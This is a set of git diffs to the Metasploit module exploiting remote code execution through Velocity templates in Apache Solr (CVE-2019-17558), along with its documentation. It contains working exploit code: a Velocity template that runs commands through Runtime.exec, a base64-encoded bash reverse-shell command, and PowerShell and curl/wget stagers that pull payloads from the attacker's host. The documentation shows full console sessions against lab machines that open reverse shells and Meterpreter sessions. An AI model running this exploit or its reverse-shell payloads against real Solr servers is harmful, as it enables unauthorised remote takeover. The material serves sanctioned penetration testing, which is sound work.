-USERNAME => user
-msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
-PASSWORD => j6lzH82e6Jc5
-msf5 exploit(multi/http/solr_velocity_rce) > check
-
-[!] Authentication required for 172.16.252.137:80!
-[*] Attempting authentication for 172.16.252.137:80...
-[*] Found Apache Solr 8.3.0
-[*] OS version is Linux amd64 4.9.0-11-amd64
-[+] Found core(s): techproducts
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
-[+] 172.16.252.137:80 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
-TARGET => 1
+[*] Found core(s): techproducts
+[+] 192.168.35.130:80 - The target is vulnerable.
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
+TARGET => 0
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.35.1
+LHOST => 192.168.35.1
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
-[*] Started reverse TCP handler on 172.17.0.1:4444
-[!] Authentication required for 172.16.252.137:80!
-[*] Attempting authentication for 172.16.252.137:80...
+[*] Started reverse TCP handler on 192.168.35.1:4444
 [*] Found Apache Solr 8.3.0
 [*] OS version is Linux amd64 4.9.0-11-amd64
-[+] Found core(s): techproducts
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
-[*] Command shell session 3 opened (172.17.0.1:4444 -> 192.168.5.9:34805) at 2019-12-26 20:15:39 +0800
+[*] Found core(s): techproducts
+[*] Targeting core 'techproducts'
+[+] Bash found, good to go!
+[*] Command shell session 2 opened (192.168.35.1:4444 -> 192.168.35.130:59956) at 2019-12-29 11:51:52 +0800
 
 uname -a
 Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux
-whoami
-solr
-```
+id
+uid=999(solr) gid=1002(solr) groups=1002(solr)
 
+```
 
 ### Docker Solr 8.2.0, no authentication
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOST 172.17.0.2
-RHOST => 172.17.0.2
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
 msf5 exploit(multi/http/solr_velocity_rce) > check
 
 [*] Found Apache Solr 8.2.0
 [*] OS version is Linux amd64 5.3.0-kali3-amd64
-[+] Found core(s): gettingstarted, techproducts
-[+] params.resource.loader.enabled for core 'gettingstarted' is set to true.
-[+] params.resource.loader.enabled for core 'techproducts' is set to true.
+[*] Found core(s): gettingstarted, techproducts
 [+] 172.17.0.2:8983 - The target is vulnerable.
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1
-TARGET => 1
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 172.17.0.1
 LHOST => 172.17.0.1
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
@@ -190,13 +160,13 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] Started reverse TCP handler on 172.17.0.1:4444
 [*] Found Apache Solr 8.2.0
 [*] OS version is Linux amd64 5.3.0-kali3-amd64
-[+] Found core(s): gettingstarted, techproducts
-[+] params.resource.loader.enabled for core 'gettingstarted' is set to true.
-[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51036) at 2019-12-26 20:10:01 +0800
+[*] Found core(s): gettingstarted, techproducts
+[*] Targeting core 'gettingstarted'
+[+] Bash found, good to go!
+[*] Command shell session 3 opened (172.17.0.1:4444 -> 172.17.0.2:59340) at 2019-12-29 11:55:32 +0800
 
 uname -a
 Linux 2667812695e4 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux
-whoami
-solr
+id
+uid=8983(solr) gid=8983(solr) groups=8983(solr)
 ```
-

--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -44,7 +44,7 @@ Payload defaults to `windows/meterpreter/reverse_tcp` for Windows (for both `Pow
 2. Linux: Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
 
 Some `cmd/unix` payloads do not work due to a quoting problem: the entire command in the Velocity template is single-quoted
-for the convenience of `CmdStager`. Some `cmd/unix` payloads as they are single-quoted, so this breaks the Velocity template.
+for the convenience of `CmdStager`. Some `cmd/unix` are single-quoted, so this breaks the Velocity template.
 
 The full list of `cmd/unix` payloads that do not work due to the quoting problem are listed below:
 1. cmd/unix/bind_awk

--- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md
+++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md
@@ -1,17 +1,18 @@
 ## Description
-This module exploits a vulnerability in Apache Solr <= 8.3.1 which allows remote code execution via a custom
+This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
 Velocity template. Currently, this module only supports Solr basic authentication.
 
-**From the Tenable advisory**:
-An attacker could target a vulnerable Apache Solr instance by first identifying a list
-of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
-HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
-Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
-template parameter in a specially crafted Solr request, leading to RCE.
+**From the Tenable advisory**
 
-Payload defaults to x86 Meterpreter reverse TCP (`windows/meterpreter/reverse_tcp`) for Windows,
-Bash reverse TCP shell (`cmd/unix/reverse_bash`) for Unix in-memory execution, and
-x86 Meterpreter reverse TCP (`linux/x86/meterpreter/reverse_tcp`) for Linux command stager.
+Link: https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability
+
+An attacker could target a vulnerable Apache Solr instance by first
+identifying a list of Solr core names. Once the core names have been
+identified, an attacker can send a specially crafted HTTP POST request
+to the Config API to toggle the params resource loader value for the
+Velocity Response Writer in the solrconfig.xml file to true. Enabling
+this parameter would allow an attacker to use the Velocity template
+parameter in a specially crafted Solr request, leading to RCE.
 
 ## Vulnerable Applications
 
@@ -36,12 +37,17 @@ Apache Solr <= 8.3.0
 
 ## Considerations
 
-Privileges gained are dependent on the user running Solr.
-Currently, this module only supports basic auth.
-Payload defaults to `windows/meterpreter/reverse_tcp` for Windows (for both `PowerShell` and `CmdStager`)
+Privileges gained are dependent on the user running Solr. Currently,
+this module only supports basic auth.
+
+Windows systems have 3 targets:
+1. x86/64 Windows PowerShell: Uses `PowerShell` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
+2. x86/64 Windows CmdStager: Uses `CmdStager` to get a shell. Payload defaults to `windows/meterpreter/reverse_tcp`
+3. Windows Exec: Executes a command and returns the output. Payload defaults to `cmd/windows/generic`
+
 *nix systems have 2 targets:
-1. Unix: Uses command execution. Payload defaults to `cmd/unix/reverse_bash`
-2. Linux: Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
+1. Unix (in memory): Uses command execution. Payload defaults to `cmd/unix/reverse_bash`. Output may be returned depending on payload used.
+2. Linux (dropper): Uses `CmdStager`. Payload defaults to `linux/x86/meterpreter/reverse_tcp`
 
 Some `cmd/unix` payloads do not work due to a quoting problem: the entire command in the Velocity template is single-quoted
 for the convenience of `CmdStager`. Some `cmd/unix` are single-quoted, so this breaks the Velocity template.
@@ -105,18 +111,12 @@ These `cmd/unix` payloads have not been tested:
 ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.132
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
 RHOSTS => 192.168.137.132
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
 LHOST => 192.168.137.128
 msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
 LPORT => 4444
-msf5 exploit(multi/http/solr_velocity_rce) > check
-
-[*] Found Apache Solr 8.3.0
-[*] OS version is Windows Server 2019 amd64 10.0
-[*] Found core(s): techproducts
-[+] 192.168.137.132:8983 - The target is vulnerable.
 msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
 TARGET => 2
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
@@ -127,31 +127,31 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
 [+] Found Powershell at C:\Windows\System32\WindowsPowerShell\v1.0\
-[*] Sending stage (180291 bytes) to 192.168.137.132
-[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.132:50100) at 2020-02-07 01:28:08 +0800
+[*] Sending stage (180291 bytes) to 192.168.137.155
+[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 192.168.137.155:50210) at 2020-03-29 00:04:01 +0800
 
 meterpreter > sysinfo
 Computer        : 2K19DTCTR
 OS              : Windows 2016+ (10.0 Build 17763).
 Architecture    : x64
-System Language : en_US
+gSystem Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
-meterpreter > 
+meterpreter >
 ```
 
 ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce 
-msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.132
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
 RHOSTS => 192.168.137.132
 msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
 LHOST => 192.168.137.128
 msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
 LPORT => 4444
-msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2
-TARGET => 2
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3
+TARGET => 3
 msf5 exploit(multi/http/solr_velocity_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.137.128:4444 
@@ -159,7 +159,6 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] OS version is Windows Server 2019 amd64 10.0
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
-[!] PowerShell not found, will revert to CmdStager for payload delivery!
 [*] Sending CmdStager payload...
 [*] Command Stager progress -   7.05% done (7160/101541 bytes)
 [*] Command Stager progress -  14.10% done (14320/101541 bytes)
@@ -175,9 +174,9 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] Command Stager progress -  84.62% done (85920/101541 bytes)
 [*] Command Stager progress -  91.67% done (93080/101541 bytes)
 [*] Command Stager progress -  98.67% done (100188/101541 bytes)
-[*] Sending stage (180291 bytes) to 192.168.137.132
+[*] Sending stage (180291 bytes) to 192.168.137.155
 [*] Command Stager progress - 100.00% done (101541/101541 bytes)
-[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.132:50209) at 2020-02-07 16:01:44 +0800
+[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.155:50211) at 2020-03-29 00:06:01 +0800
 
 meterpreter > sysinfo
 Computer        : 2K19DTCTR
@@ -188,11 +187,33 @@ Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter > 
-
-
 ```
 
-### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory (example payload is cmd/unix/reverse_bash)
+### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic`
+```
+msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155
+RHOSTS => 192.168.137.132
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 4
+TARGET => 4
+msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami
+CMD => whoami
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Found Apache Solr 8.3.0
+[*] OS version is Windows Server 2019 amd64 10.0
+[*] Found core(s): techproducts
+[*] Targeting core 'techproducts'
+[+] 2k19dtctr\administrator
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/solr_velocity_rce) > 
+```
+
+### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash`
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce 
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
@@ -216,14 +237,44 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
-[*] Command shell session 3 opened (192.168.137.128:4444 -> 192.168.137.129:48680) at 2020-02-07 16:04:29 +0800
+[*] Command shell session 17 opened (192.168.137.128:4444 -> 192.168.137.129:48600) at 2020-03-29 00:20:50 +0800
 
 id
 uid=999(solr) gid=1002(solr) groups=1002(solr)
-
 ```
 
-### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager
+### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic`
+```
+msf5 > use exploit/multi/http/solr_velocity_rce 
+msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
+RHOSTS => 192.168.137.129
+msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80
+RPORT => 80
+msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0
+TARGET => 0
+msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user
+USERNAME => user
+msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5
+PASSWORD => j6lzH82e6Jc5
+msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128
+LHOST => 192.168.137.128
+msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444
+LPORT => 4444
+msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami
+CMD => whoami
+msf5 exploit(multi/http/solr_velocity_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.137.128:4444 
+[*] Found Apache Solr 8.3.0
+[*] OS version is Linux amd64 4.9.0-11-amd64
+[*] Found core(s): techproducts
+[*] Targeting core 'techproducts'
+[+] solr
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/http/solr_velocity_rce) > 
+```
+
+### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp`
 ```
 msf5 > use exploit/multi/http/solr_velocity_rce 
 msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129
@@ -247,13 +298,13 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit
 [*] OS version is Linux amd64 4.9.0-11-amd64
 [*] Found core(s): techproducts
 [*] Targeting core 'techproducts'
-[*] Using URL: http://0.0.0.0:8080/L9Iefj
-[*] Local IP: http://192.168.137.128:8080/L9Iefj
-[*] Client 192.168.137.129 (curl/7.52.1) requested /L9Iefj
+[*] Using URL: http://0.0.0.0:8080/PDeRPN1t
+[*] Local IP: http://192.168.137.128:8080/PDeRPN1t
+[*] Client 192.168.137.129 (curl/7.52.1) requested /PDeRPN1t
 [*] Sending payload to 192.168.137.129 (curl/7.52.1)
 [*] Sending stage (985320 bytes) to 192.168.137.129
-[*] Meterpreter session 4 opened (192.168.137.128:4444 -> 192.168.137.129:48694) at 2020-02-07 16:07:41 +0800
-[*] Command Stager progress - 100.00% done (147/147 bytes)
+[*] Meterpreter session 18 opened (192.168.137.128:4444 -> 192.168.137.129:48604) at 2020-03-29 00:23:13 +0800
+[*] Command Stager progress - 100.00% done (149/149 bytes)
 [*] Server stopped.
 
 meterpreter > sysinfo

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -3,13 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-###
-#
-# This exploit sample shows how an exploit module could be written to exploit
-# a bug in an arbitrary TCP server.
-#
-###
-require 'json'
 require 'msf/core/exploit/powershell'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -77,6 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
               ]
             ],
         'DisclosureDate' => "Oct 29 2019",
+        'DefaultOptions' => { 'TARGET'  => 1 },
         'Privileged'     => false
       )
     )
@@ -88,6 +82,9 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [false, 'Solr password (default is SolrRocks)', 'SolrRocks'])
       ]
     )
+    deregister_options('URIPATH')
+    deregister_options('SRVHOST')
+    deregister_options('SRVPORT')
   end
 
   # are we just checking? or are we exploiting?
@@ -113,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # successfully connected?
     unless auth_check
-      return CheckCode::Unknown('Connection failed')
+      return CheckCode::Unknown('Connection failed!')
     end
 
     # if return code is not 200, then the Solr instance definitely requires authentication
@@ -169,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # can't connect? that's an automatic failure
     unless ver
-      vprint_error("Connection failed!")
+      vprint_error("Connection failed!!")
       return CheckCode::Unknown
     end
 
@@ -273,7 +270,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # we are prepping to check and exploit, not prepping to check only
     @vuln_check = false
     unless [CheckCode::Vulnerable].include? check
-      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
+      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
     end
 
     # the new config in JSON format
@@ -300,9 +297,13 @@ class MetasploitModule < Msf::Exploit::Remote
                       'data'          => @enable_params_resource_loader
         })
 
+      unless update_config
+        fail_with Failure::Unreachable, 'Connection failed!'
+      end
+
       # if we got anything other than a 200 back, the configuration update failed and the exploit won't work
       unless update_config.code == 200
-        fail_with(Failure::UnexpectedReply, 'Unable to update config, exploit failed!')
+        fail_with Failure::UnexpectedReply, 'Unable to update config, exploit failed!'
       end
 
       print_good("params.resource.loader.enabled is now set to true!")
@@ -311,8 +312,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # windows...
     if @target_platform.include? "Windows"
       # if target is wrong, warn and exit before doing anything
-      unless targets[datastore['TARGET']].name.include? "Windows"
-        fail_with(Failure::NoTarget, 'Target is found to be Windows, please select the proper target!')
+      unless target.name.include? "Windows"
+        fail_with Failure::NoTarget, 'Target is found to be Windows, please select the proper target!'
       end
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
@@ -320,7 +321,7 @@ class MetasploitModule < Msf::Exploit::Remote
       psh_enum = execute_command("where powershell", {'core_name' => @core_name})
       # abort the exploit if PowerShell was not found
       unless (/powershell/i) =~ psh_enum.body.to_s
-        fail_with(Failure::NoTarget, "PowerShell not found, aborting exploit attempt!")
+        fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
       end
 
       vprint_good("PowerShell found at #{psh_enum.body.to_s.split('0  ')[1].strip}")
@@ -333,8 +334,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # or unix-based?
     if @target_platform.include? "Linux"
       # if target is wrong, warn and exit before doing anything
-      unless targets[datastore['TARGET']].name.include? "Unix"
-        fail_with(Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!')
+      unless target.name.include? "Unix"
+        fail_with Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!'
       end
 
       # base64 payload has to be URI encoded
@@ -348,9 +349,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
-    # cmd must be uri-encoded, or the exploit fials
-    uri_encoded_cmd = Rex::Text.uri_encode(cmd)
-    # custom template which enables command execution
+    # custom template which enables command execution. cmd must be uri-encoded, or the exploit fials
     template = URI.encode('#set($x="")+' \
     '#set($rt=$x.class.forName("java.lang.Runtime"))+' \
     '#set($chr=$x.class.forName("java.lang.Character"))+' \
@@ -359,7 +358,7 @@ class MetasploitModule < Msf::Exploit::Remote
     '$ex.waitFor()+#set($out=$ex.getInputStream())+' \
     '#foreach($i+in+[1..$out.available()])' \
       '$str.valueOf($chr.toChars($out.read()))' \
-    '#end').gsub("PAYLOAD_HERE", uri_encoded_cmd)
+    '#end').gsub("PAYLOAD_HERE", Rex::Text.uri_encode(cmd))
 
     # execute the exploit...
     send_request_cgi({

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpClient
 
@@ -17,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'           => 'Apache Solr Remote Code Execution via Velocity Template',
         'Description'    => %q(
-          This module exploits a vulnerability in Apache Solr <= 8.2.0 which allows remote code execution via a custom
+          This module exploits a vulnerability in Apache Solr <= 8.3.1 which allows remote code execution via a custom
           Velocity template. Currently, this module only supports Solr basic authentication.
 
           From the Tenable advisory:
@@ -25,10 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
           of Solr core names. Once the core names have been identified, an attacker can send a specially crafted
           HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response
           Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity
-          template parameter in a specially crafted Solr request, leading to RCE. This vulnerability currently does not
-          have a CVE number assigned.
+          template parameter in a specially crafted Solr request, leading to RCE.
 
-          Payload defaults to x86 Meterpreter reverse TCP for Windows and plain old reverse TCP shell for Linux.
+          Payload defaults to x86 Meterpreter reverse TCP for Windows and Bash reverse TCP shell for Linux.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -41,31 +41,45 @@ class MetasploitModule < Msf::Exploit::Remote
         'References'     =>
             [
               [ 'EDB', '47572' ],
+              [ 'CVE', '2019-17558' ],
               [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'],
               [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'],
               [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'],
               [ 'URL', 'https://github.com/jas502n/solr_rce'],
               [ 'URL', 'https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template'],
             ],
-        'Platform'       => ['unix', 'win'],
+        'Platform'       => ['linux', 'unix', 'win'],
         'Targets'        =>
             [
               [
-                'Unix-based',
+                'Unix (in-memory)',
                 {
-                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
-                  'Arch'     => ARCH_CMD,
-                  'Platform' => 'Unix'
+                  'Platform'       => 'unix',
+                  'Arch'           => ARCH_CMD,
+                  'Type'           => :unix_memory,
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+                }
+              ],
+              [
+                'Linux (dropper)',
+                {
+                  'Platform'        => 'linux',
+                  'Arch'            => [ARCH_X86, ARCH_X64],
+                  'Type'            => :linux_dropper,
+                  'DefaultOptions'  => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+                  'CmdStagerFlavor' => %w[curl wget]
                 }
               ],
               [
                 'x86/x64 Windows',
                 {
-                  'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
-                  'Arch'     => [ARCH_X86, ARCH_X64],
-                  'Platform' => 'Windows'
+                  'Platform'        => 'win',
+                  'Arch'            => [ARCH_X86, ARCH_X64],
+                  'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
+                  # TODO: find more cmdstager flavors for windows
+                  'CmdStagerFlavor' => %w[vbs certutil]
                 }
-              ]
+              ],
             ],
         'DisclosureDate' => "Oct 29 2019",
         'DefaultTarget'  => 0,
@@ -87,7 +101,6 @@ class MetasploitModule < Msf::Exploit::Remote
   @vuln_core = ""
   # OS specific stuff
   @target_platform = ""
-  @target_arch = ""
   # if authentication is used
   @auth_string = ""
 
@@ -149,9 +162,9 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Found Apache Solr #{solr_version}")
     # get OS version details
     @target_platform = ver_json['system']['name']
-    @target_arch = ver_json['system']['arch']
+    target_arch = ver_json['system']['arch']
     target_osver = ver_json['system']['version']
-    print_status("OS version is #{@target_platform} #{@target_arch} #{target_osver}")
+    print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")
     # uname doesn't show up for Windows, so run a check for that
     if ver_json['system']['uname']
       # print uname only when verbose
@@ -290,91 +303,82 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
-      # lazy check for PowerShell
-      psh_enum = execute_command("where powershell", 'core_name' => @vuln_core[0])
+      winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'core_name' => @vuln_core[0], 'winenv_check' => true)
       # did it connect?
-      unless psh_enum
+      unless winenv_path
         fail_with Failure::Unreachable, "Connection failed!"
       end
 
-      unless /powershell/i =~ psh_enum.body.to_s
-        # no PowerShell found by automatic check? do a manual check
-        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 'core_name' => @vuln_core[0])
-        # got a successful connection?
-        unless psh_enum_second
-          fail_with Failure::Unreachable, "Connection failed!"
-        end
-        # no PowerShell found by manual check?
-        unless /powershell.exe/i =~ psh_enum_second.body.to_s
-          # abort the exploit if PowerShell was not found
-          # unfortunately, CmdStager doesn't work, as the CmdStager chunks are being written twice to the temp file
-          fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
-        end
+      # did the command to check for PATH execute?
+      unless winenv_path.code == 200
+        fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
       end
 
-      print_good("PowerShell found, good to go!")
-      # generate PowerShell command, encode with base64, and remove comspec
-      psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
-      # manually specify PowerShell path
-      if psh_enum_second
-        psh_cmd.insert(0, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")
-      end
+      # is PowerShell in PATH?
+      # winenv_path.body = ""
+      print_status(winenv_path.body.to_s)
+      if /powershell/i =~ winenv_path.body.to_s
+        # only interested in the contents of PATH. Everything before it is irrelevant
+        paths = winenv_path.body.split('=')[1]
+        # confirm that PowerShell exists in the PATH by checking each one
+        paths.split(';').each do |path_val|
+          # if PowerShell exists in PATH, then we are good to go
+          unless /powershell/i =~ path_val
+            next
+          end
 
-      # prepare to exploit...
-      execute_command(psh_cmd, 'core_name' => @vuln_core[0])
+          print_good("Found Powershell at #{path_val}")
+          # generate PowerShell command, encode with base64, and remove comspec
+          psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+          # specify full path to PowerShell
+          psh_cmd.insert(0, path_val)
+          # exploit the thing
+          execute_command(psh_cmd, 'core_name' => @vuln_core[0])
+        end
+      # no PowerShell? revert to CmdStager
+      else
+        print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
+        print_status("Sending CmdStager payload...")
+        # Execute the CmdStager
+        # TODO: determine max length
+        execute_cmdstager(linemax: 1500, 'core_name' => @vuln_core[0])
+      end
     end
 
     # or unix-based?
     if @target_platform.include? "Linux"
+      if target.name.include? "Unix"
+        # lifted from https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html
+        cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
+        execute_command(cmd, 'core_name' => @vuln_core[0])
+      elsif target.name.include? "Linux"
+        execute_cmdstager('core_name' => @vuln_core[0])
       # if target is wrong, warn and exit before doing anything
-      unless target.name.include? "Unix"
+      else
         fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
       end
-
-      # exploiting for Linux relies heavily on Bash, so go find it first
-      # lazy check for Bash
-      bash_enum = execute_command("which bash", 'core_name' => @vuln_core[0])
-      # did it connect?
-      unless bash_enum
-        fail_with Failure::Unreachable, "Connection failed!"
-      end
-
-      # no Bash found by automatic check?
-      unless /bash/i =~ bash_enum.body.to_s
-        # manual check for Bash
-        bash_enum_second = execute_command("ls /bin/bash", 'core_name' => @vuln_core[0])
-        # got a successful connection?
-        unless bash_enum_second
-          fail_with Failure::Unreachable, "Connection failed!"
-        end
-
-        # no Bash found by manual check?
-        unless /bash/i =~ bash_enum_second.body.to_s
-          fail_with Failure::NoTarget, "Bash not found, aborting exploit attempt!"
-        end
-      end
-
-      print_good("Bash found, good to go!")
-      # base64 payload. let the send_request_cgi from execute_command do the encoding
-      # works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
-      bash_cmd = "bash -c {echo,#{Rex::Text.encode_base64(payload.encoded)}}|{base64,-d}|{bash,-i}"
-      # prepare to exploit...
-      execute_command(bash_cmd, 'core_name' => @vuln_core[0])
     end
   end
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
     # custom template which enables command execution
-    template = <<-VELOCITY
+    template = <<~VELOCITY
       #set($x="")
       #set($rt=$x.class.forName("java.lang.Runtime"))
       #set($chr=$x.class.forName("java.lang.Character"))
       #set($str=$x.class.forName("java.lang.String"))
-      #set($ex=$rt.getRuntime().exec("#{cmd}"))
-      $ex.waitFor() #set($out=$ex.getInputStream())
-      #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+      #set($ex=$rt.getRuntime().exec('#{cmd}'))
+      $ex.waitFor()
     VELOCITY
+
